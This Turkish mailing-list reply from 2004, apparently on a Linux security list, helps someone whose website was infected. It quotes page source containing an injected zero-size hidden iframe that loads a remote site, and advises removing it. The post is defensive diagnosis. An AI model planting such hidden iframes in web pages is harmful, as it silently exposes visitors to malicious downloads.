Re: Windos'a yine virüs bulaşmış (Eski konu : RE: [Linux-guvenlik] redhat 9'a virus bulasmis.)

From: Cem Kamil Kulekci (editor@penguen.web.tr)
Date: Fri 15 Oct 2004 - 11:13:16 EEST

Devrim GUNDUZ wrote:

> [...]

Evet olay ie ile alakalı ama sanırım onun dışında bişeyler var. örneğin
kodlara bakarsanız

        <title>
                cozumteknik.com
        </title>

<iframe src="http://www.splitinfinity.info/fa/?d=get" width=0 height=0></iframe> <style>
        * { font-family: verdana; font-size: 10pt; COLOR: gray; }
        b { font-weight: bold; }

bölümünü görebilirsiniz. bu frame'i hemen kodlarınızdan kaldırın.
(kodlara ie ile bakmayın bazen bu tip kodları atlayabiliyor mozilla
kullanabilirsiniz.) netdizayn.net ile ilgili herhangi bir sorun görünmüyor.

Kolay gelsin

Cem.